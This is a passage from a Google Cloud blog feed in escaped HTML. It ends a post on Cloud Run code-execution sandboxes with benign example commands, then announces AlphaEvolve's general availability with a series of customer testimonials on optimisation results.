    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# Write data from the sandbox to an archive file that can be persisted\r\nsandbox do --write --export-tar=/tmp/work.tar \\\r\n  -- /bin/bash -c &amp;quot;mkdir -p /tmp/work &amp;amp;&amp;amp; echo \&amp;#x27;task-complete\&amp;#x27; &amp;gt; /tmp/work/status.txt&amp;quot;\r\n\r\n# Import the archive file in a new sandbox\r\nsandbox do --write --import-tar=/tmp/work.tar \\\r\n  -- /bin/bash -c &amp;quot;cat /tmp/work/status.txt&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b49a27850&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;ADK and ComputeSDK built-in support&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Run sandboxes will be supported in the next version of &lt;/span&gt;&lt;a href="https://adk.dev/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Development Kit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with a new &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;CloudRunSandboxCodeExecutor&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. This integration gives your ADK agents running on Cloud Run the ability to execute code in one single line:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;from google.adk.agents import Agent\r\nfrom google.adk.integrations.cloud_run import CloudRunSandboxCodeExecutor\r\n\r\nanalyst_agent = Agent(\r\n    name=&amp;quot;cloud_run_data_analyst&amp;quot;,\r\n    model=&amp;quot;gemini-3.1-pro-preview&amp;quot;,\r\n    system_instruction=(\r\n        &amp;quot;You are an expert data analyst. Write and execute Python code to answer &amp;quot;\r\n        &amp;quot;user questions and process data safely.&amp;quot;\r\n    ),\r\n    code_executor=CloudRunSandboxCodeExecutor(),\r\n)&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b48c1ca30&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Run sandboxes were also added to &lt;/span&gt;&lt;a href="https://docs.computesdk.com/getting-started/introduction" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ComputeSDK&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a vendor agnostic SDK for running sandboxes. This SDK allows you to either invoke sandboxes remotely from outside the Cloud Run service or use them directly as a local tool on the service. You can learn how to use this SDK for Cloud Run sandboxes &lt;/span&gt;&lt;a href="https://github.com/computesdk/computesdk/tree/main/packages/cloud-run" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Get started today&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Unlike dedicated sandbox hosting platforms that charge high premiums for on-demand virtual machines, Cloud Run sandboxes run &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;directly on your existing allocated CPU and memory&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. Because the sandboxes share the resources of your running instances, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;there is no additional cost or premium to use this feature. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;You can check out our documentation &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/run/docs/code-execution"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/google-cloud-run-sandboxes-are-in-public-preview" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-09T16:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/alphaevolve-is-available-for-everyone</id>
    <title>Solve harder problems with AlphaEvolve, now available to everyone on Google Cloud</title>
    <updated>2026-07-09T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Many of the most challenging and valuable problems in the world are related to optimization. Now, AI is now making these problems tractable. If you've&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; ever tried to design a microchip, plan a delivery network, or &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;optimize a training architecture for a large AI model&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, you know how hard it is to find the most optimized code. Traditional coding methods often cannot explore all the possible algorithms and implementations because the search space is simply too vast. To help, we introduced &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/alphaevolve-on-google-cloud/?e=0"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AlphaEvolve last year in private preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; — an agent to help you &lt;/span&gt;&lt;a href="https://deepmind.google/blog/alphaevolve-a-gemini-powered-coding-agent-for-designing-advanced-algorithms/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;design better algorithms&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on Google Cloud. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;What’s new: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Today, AlphaEvolve is generally available (GA) on &lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. AlphaEvolve is a code optimization and discovery agent built on top of Gemini that helps solve the hardest algorithmic problems for your business and research. It has been tested in diverse domains like logistics, semiconductors, genomics, high performance computing, and financial services during our early access program. It systematically explores the search space to find solutions optimized for your problem.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deploying AlphaEvolve within your environment follows a structured four-step process designed to move from initial problem definition to fully optimized production code:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Define:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Provide a baseline seed algorithm and problem definition, together with background knowledge that provides context about the problem you want to solve.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Measure:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Establish a scoring function to objectively score candidate programs on one or more metrics important for your problems such as correctness, performance, and operational constraints.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Optimize:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Use AlphaEvolve’s agentic harness to generate optimized code.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Apply:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Deploy the resulting, highly optimized algorithm directly into your production workloads and infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this post, we’ll share how organizations are already seeing impact with AlphaEvolve and how you can get started. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;How organizations are using AlphaEvolve &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AlphaEvolve has grown from a research project into a key tool we use at Google. Now, some of the world’s most innovative organizations are using it to solve their algorithmic problems, too.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image3" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2-AlphaEvolve_logo_wall.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;BASF: Building a digital twin to optimize global supply chains&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"We had several attempts to build a digital twin for our complex supply network using deterministic models, and all of them failed. By using AlphaEvolve, we can now not only map the complex network based on system data, but at the same time understand and copy the human decisions that drive our daily operations. This gives us a highly accurate and easy to maintain data driven digital twin of the entire network."&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;— Dr. Goetz Krabbe, Vice President for Global Supply Chain, &lt;/span&gt;&lt;a href="https://www.basf.com/global/en/who-we-are" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BASF&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;  &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visit the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/how-basf-manages-thousands-of-supply-chain-decisions-with-alphaevolve?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to read more how BASF used AlphaEvolve to improve their existing planning and forecasting models by over 80%.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Coolblue: Optimizing e-commerce demand forecasting&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;“Coolblue data scientists used AlphaEvolve to directly optimize their 28-day demand forecasting pipeline, focusing on automated feature engineering, target preprocessing, and model selection. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;In just a few (200) iterations, AlphaEvolve improved our production forecast (by reducing WMAPE over the existing solution) by over 5%.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; These gains were achieved through improved feature engineering, an ensemble of different regression models, and better target preprocessing proposed and validated by AlphaEvolve. To ensure sufficient stock availability, it is crucial that the demand forecast is accurate for both the short term (the first 7 days) and the longer horizon (the full 28 days). AlphaEvolve achieved this by using an evaluation metric that combines both periods, along with a strict penalty for under forecasting. AlphaEvolve has proven its ability to significantly improve bulk purchasing decisions and help us maintain optimal stock levels for the weeks ahead.” — Cas Ruger, Data Scientist at &lt;/span&gt;&lt;a href="https://aboutcoolblue.com/en/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Coolblue&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;FM Logistic: Optimizing warehouse routing&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Through our partnership with Google Cloud and the implementation of AlphaEvolve and Gemini, we further optimized our routing approach for fast-moving operations. The 10.4% improvement was achieved on top of an already highly optimized baseline, where further gains are typically hard to come by. This translates directly to faster fulfillment, improved working conditions for our teams, and reduced wear on our fleet&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;." &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;— &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Rodolphe Bey&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Group CIO at &lt;/span&gt;&lt;a href="https://www.fmlogistic.com/about-us/overview-fm-logistic/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;FM Logistic&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visit the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/how-fm-logistic-tackled-the-traveling-salesman-problem-at-warehouse-scale-with-alphaevolve?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://www.google.com/search?q=fm+logistic+anant+nawalgaria&amp;amp;oq=fm+logistic&amp;amp;gs_lcrp=EgZjaHJvbWUqCAgCEEUYJxg7MgYIABBFGDwyBggBEEUYOzIICAIQRRgnGDsyBggDEEUYPDIGCAQQRRg8MgYIBRBFGDwyBggGEEUYQDIGCAcQRRhA0gEIMzgzMGowajSoAgCwAgE&amp;amp;sourceid=chrome&amp;amp;ie=UTF-8" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;website&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to read more about how FM Logistic used AlphaEvolve to improve warehouse routing by 10.4%, saving over 15,000 km in staff travel. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Infineon: Optimizing chip design&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Our initial experiments with AlphaEvolve have been &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;very&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; positive, demonstrating its potential to transform the chip design lifecycle. We see a clear &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;potential&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; for it &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;to contribute to&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; multiple stages of development, including areas like Surrogate modelling." &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;— Michael Kollig, CIO, &lt;/span&gt;&lt;a href="https://www.infineon.com/about" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Infineon&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;JetBrains: Accelerating IDE performance&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;AlphaEvolve can change how we approach complex performance work. It turns optimizations that were once too time-consuming to explore into candidates we can test routinely. Engineers still own the benchmark, review, and release decision. The search space is what gets smaller.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;" — Dmitrii Batkovich, Director of Engineering, &lt;/span&gt;&lt;a href="https://www.jetbrains.com/company/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;JetBrains&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visit the &lt;/span&gt;&lt;a href="https://blog.jetbrains.com/ai/2026/05/how-we-use-alphaevolve-to-make-complex-ide-algorithms-faster/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to read more about how Jetbrains used AlphaEvolve to improve their IDE performance by over 15-20%.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Kinaxis: Improving optimization and forecasting systems&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"Kinaxis researchers have used AlphaEvolve to materially improve both the speed and quality of highly mature forecasting and optimization algorithms. In early testing, we achieved improvements of more than 22% in key forecasting accuracy metrics while reducing runtime by over 90% on benchmark datasets. As supply chains become increasingly complex and unpredictable, AlphaEvolve has the potential to help the world's largest organizations make faster, more informed decisions and adapt with greater confidence." — Gelu Ticala, Chief Technology Officer, &lt;/span&gt;&lt;a href="https://www.kinaxis.com/en/about" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Kinaxis&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visit the &lt;/span&gt;&lt;a href="https://www.kinaxis.com/en/blog/how-kinaxis-using-ai-build-better-supply-chain-software" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to read more about how Kinaxis used AlphaEvolve to achieve significant gains across their forecasting and runtime metrics.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Klarna: Doubling throughput while improving model quality&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Klarna applied AlphaEvolve to one of their largest ML training pipelines and doubled throughput while improving model quality, all under the strict reproducibility constraints of regulated financial services. Over three weeks, the system explored nearly 6,000 candidate programs, discovering deep architectural rewrites no engineer would have tried.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;" — Klarna engineering team. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visit the &lt;/span&gt;&lt;a href="https://medium.com/klarna-engineering/beyond-prompting-how-algorithmic-evolution-doubled-our-training-speed-8f874af3080d" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to read more about how Klarna used AlphaEvolve to double Training Speed and improve performance for their foundational models.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Kuro Games: Server-side Optimization&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"At Kuro Games, our guiding principle is that AI should not just make our work faster — it should make our work better. AlphaEvolve is a real-world validation of that principle. We applied it to a complex backend optimization challenge and saw substantial performance gains in specific server-side workloads. AlphaEvolve handles the kind of optimization work machines do best, so our engineers can focus on what only people can do: crafting great games." — Lin Chenchen Chief Technology Officer, &lt;/span&gt;&lt;a href="https://www.kurogames.com/introduction" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Kuro Games&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Oak Ridge National Laboratory: GPU kernel generation for exascale computing&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Under Google DeepMind’s &lt;/span&gt;&lt;a href="https://deepmind.google/blog/google-deepmind-supports-us-department-of-energy-on-genesis/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Genesis Mission partnership&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with the Department of Energy to provide early-access to our AI for science tools.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“Oak Ridge National Laboratory (ORNL) recently partnered with Google to deploy AlphaEvolve on Frontier, the world’s first exascale supercomputer. The research team built a closed-loop evaluation architecture that bridges cloud-based large language model code generation with Frontier’s execution environment. The designed system optimizes mixed-precision GPU kernels—which requires complex, coupled decisions about memory, data layout, and hardware synchronization — by iteratively generating, compiling, running, and validating candidate programs, directly on the supercomputer's AMD GPUs. This executable search framework evaluates each proposed structural optimization against numerical accuracy rules.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“Our collaboration with Google's AlphaEvolve team gave us an early look at how evolutionary programming can be combined with leadership-class supercomputing. By running AlphaEvolve on Frontier, we explored a large number of optimization candidates in parallel, including novel implementation variants that helped us explore parts of the design space we might not have reached through manual optimization alone. This is an encouraging first step toward applying AI-assisted optimization to increasingly complex scientific software." &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;— Oscar Hernandez Mendoza, PhD, Senior Computer Scientist, ORNL&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Old Dominion University: Modeling biological aging mortality rates&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"The Qin Lab at Old Dominion University used AlphaEvolve to search the space of Python programs that model biological aging mortality rates, a problem in computational biogerontology where the governing equations span multiple empirical laws. Utilizing an HPC cluster in Google Cloud as a part of the ODU MonarchSphere initiative, AlphaEvolve – across approximately 500 evaluations – independently rediscovered the Kannisto logistic mortality model (a published result from the 1990s biogerontology literature) with no prior knowledge of that literature, improved the Emergent Aging Model composite fitness score by 19% through heterogeneous decay rate distributions, and demonstrated near-perfect Strehler-Mildvan correlation (0.949) via scale-free network topology with Laplacian spectral aging across approximately 500 evaluations. The central finding is that structurally diverse models all converge on the same empirical aging laws, providing evidence that Gompertz, Strehler-Mildvan, and Kannisto regularities are robust attractors of biological systems. The team plans to extend this work to multi-species datasets and to connect the evolved program structures to testable biological mechanisms.” &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;— &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Dr. Hong Qin,Department of Computer Science, &lt;/span&gt;&lt;a href="https://www.odu.edu/about/facts-and-figures" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Old Dominion University&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;PacBio: Scaling accuracy and lowering costs in genomics&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"The solution the Google team discovered using AlphaEvolve unlocks meaningfully higher accuracy rates for our sequencing instruments. For researchers, this higher-quality data might enable the discovery of previously hidden disease-causing mutations." — Aaron Wenger (Senior Director, PacBio).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visit the &lt;/span&gt;&lt;a href="https://www.pacb.com/blog/improving-hifi-sequencing-accuracy-with-google-deepconsensus-and-alphaevolve/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to read more about how Pacbio used AlphaEvolve &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;to improve &lt;/span&gt;&lt;a href="https://www.nature.com/articles/s41587-022-01435-7" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;DeepConsensus&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; — a model developed by Google Research for correcting DNA sequencing errors — achieving a 30% reduction in variant detection errors.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Pebble: Optimizing serving performance on GPUs&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"Optimizing inference serving is an incredibly challenging problem because it is a multi-dimensional system design challenge that shifts dynamically between memory, compute, and hardware orchestration constraints. NVIDIA's AI Configurator latency model was severely bottlenecked by a single, static 0.8 empirical correction factor that applied uniformly to all workloads, and did not model FP8-vs-BF16 efficiency divergence, causing recommended configurations to drift away from the optimum. AlphaEvolve solved this by autonomously discovering GPU performance modeling formulations directly from our training prior. This Gemini-powered evolutionary approach drastically cut our model errors by more than delivering a 56% relative error reduction. We are excited to integrate this smoother, learned efficiency function and leverage AlphaEvolve to continuously map emerging hardware specifications without manual tuning." — Keval Shah Head of AI, &lt;/span&gt;&lt;a href="https://www.gopebble.com/about-us/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Pebble&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Qbraid: Advancing quantum computing&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"AlphaEvolve delivered a result on top of an encoding family we had already spent years refining. It searched a design space far too large to comb through by hand and handed back something we could read, verify, and understand. Systems like AlphaEvolve will meaningfully accelerate progress toward useful quantum computing." &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;— &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Kenny Heitritter, Vice President of Research and Development at &lt;/span&gt;&lt;a href="https://www.qbraid.com/about" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;qBraid&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visit the &lt;/span&gt;&lt;a href="http://qbraid.com/blog-posts/qbraid-uses-alphaevolve-for-quantum-error-correction" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="http://arxiv.org/pdf/2606.25870" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;paper&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to read more about how Qbraid&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; used AlphaEvolve to find significantly more error efficient error-correcting codes for quantum chemistry.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Schrödinger: Shortening cycles for molecular simulations for drug discovery&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"AlphaEvolve allows us to explore larger chemical spaces faster and more efficiently than ever before. Faster MLFF inference carries real business impact, shortening R&amp;amp;D cycles in drug discovery, catalyst design, and materials development, and enabling companies to screen molecular candidates in days rather than months." — Gabriel Marques, ML Tech Lead, &lt;/span&gt;&lt;a href="https://www.schrodinger.com/company/about/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Schrödinger&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visit the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/schrodinger-alphaevolve-molecular-discovery-accelerates-4x"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to read more about how Schröedinger used AlphaEvolve to quadruple the speed of molecular discovery.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Substrate: Accelerating runtime speed for semiconductor simulation&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;“AlphaEvolve transformed the speed and efficiency of our computational lithography frameworks and, more impressively, demonstrated the potential of these models to design their future selves, all the way down to the atoms.”&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; — James Proud, CEO, &lt;/span&gt;&lt;a href="https://www.schrodinger.com/company/about/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Substrate&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
